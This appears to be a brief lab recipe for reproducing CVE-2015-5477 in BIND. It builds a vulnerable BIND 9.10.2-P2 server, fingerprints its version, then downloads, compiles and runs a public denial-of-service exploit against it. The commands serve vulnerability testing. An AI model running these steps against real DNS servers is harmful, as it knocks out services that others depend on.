Server
# wget -O bind-9-10-2-p2.tar.gz https://www.isc.org/downloads/file/bind-9-10-2-p2/?version=tar-gz
# tar xvzf bind-9-10-2-p2.tar.gz
# cd bind-9.10.2-P2
# ./configure --without-openssl
# make
# touch /etc/named.conf
# bin/named/named -g
Client
# apt-get install fpdns
# fpdns server_ip
# dig @server_ip -c chaos -t txt version.bind +short
# wget https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c
# gcc -o tkill tkill.c
# ./tkill server_ip
# cat cve-2015-5477.py
# python cve-2015-5477.py server_ip
Reference
https://github.com/robertdavidgraham/cve-2015-5477